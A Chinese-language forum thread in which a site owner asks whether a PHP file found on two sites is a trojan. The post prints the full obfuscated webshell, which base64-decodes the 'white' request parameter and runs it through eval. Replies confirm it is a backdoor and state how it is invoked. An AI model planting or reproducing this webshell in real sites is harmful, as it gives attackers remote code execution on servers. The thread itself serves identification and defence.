这个php文件是不是木马？

luckmc · 发表于 2022-12-7 16:12:22

还请懂个老哥解惑下，两个站都有类似的文件；

<?php
class tb3abe
{
  public $base64;
  function __construct()
  {
$this->/*b1688a027dd4d8f1d*/base64/*d505aa2a7eff*/=$_REQUEST['white'];
  }
  function __toString()
  {
return /*a8cc97610c62df*/base64_decode/*99013d759*/($this->base64);
  }

}
class f4d59f554e217
{
  protected $e=null;
  function __construct()
  {
$this->e = new tb3abe();

  }
  function __destruct()
  {

/*8c0a6173cd9e3866c85b0bc1e8*/@eval/*0929963467231de36ce*/($this->e);
  }

}
$one = new f4d59f554e217();
?>

juniko · 发表于 2022-12-7 16:14:06

必然是木马了，先base64解码，再调用eval函数

Alook · 发表于 2022-12-7 16:16:36

juniko 发表于 2022-12-7 16:14
必然是木马了，先base64解码，再调用eval函数

是不是调了eval函数的大部分都是木马，正常程序一般都不允许用这个函数吧，太危险了

luckmc · 发表于 2022-12-7 16:18:53

juniko 发表于 2022-12-7 16:14
必然是木马了，先base64解码，再调用eval函数

多谢老哥，我先删了？能详细说下吗。我看不懂

juniko · 发表于 2022-12-7 16:19:04

Alook 发表于 2022-12-7 16:16
是不是调了eval函数的大部分都是木马，正常程序一般都不允许用这个函数吧，太危险了 ...

正常也有用这个函数的，特别是一些缓存之类的。说危险这个函数估计能排前几了

920 · 发表于 2022-12-7 17:04:30

有eval这个函数99%是了

920 · 发表于 2022-12-7 17:05:33

有一个文件的说明系统有漏洞了，你就算删了他下次可以还是可以入侵进来，下次估计手段就更隐蔽了

hins · 发表于 2022-12-7 21:19:37

本帖最后由 hins 于 2022-12-7 21:31 编辑

是木马，有eval函数执行方法 ?white=base64机密过的php代码

		自动登录	找回密码
密码			注册

[疑问] 这个php文件是不是木马？